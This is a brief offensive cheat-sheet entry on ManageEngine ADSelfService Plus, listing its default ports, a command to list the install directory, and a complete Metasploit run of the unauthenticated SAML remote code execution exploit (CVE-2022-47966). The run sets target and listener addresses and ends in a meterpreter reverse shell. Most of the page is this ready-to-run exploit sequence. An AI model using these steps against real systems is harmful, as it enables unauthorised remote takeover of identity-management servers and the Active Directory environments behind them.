ManageEngine ADSelfService Plus PrivEsc

Last modified: 2023-04-16

Privilege Escalation Windows

ADSelfService Plus is an integrated Active Directory self-service password management and single sign-on solution that reduces password-related help desk calls. Its default ports are 8888 (HTTP) and 9251 (HTTPS).


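List the installation directory, including hidden items (the path must be quoted because it contains spaces and parentheses):

dir -Force "\Program Files (x86)\ManageEngine\ADSelfService Plus\"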

Unauthenticated SAML RCE (CVE-2022-47966)


msf> use exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966
msf> set GUID 43ae36f51da65753530a64b37a510a53
msf> set ISSUER_URL
msf> set RHOSTS <target-ip>
msf> set RPORT 9251
msf> set LHOST <local-ip>
msf> set LPORT 4444
msf> run
meterpreter> shell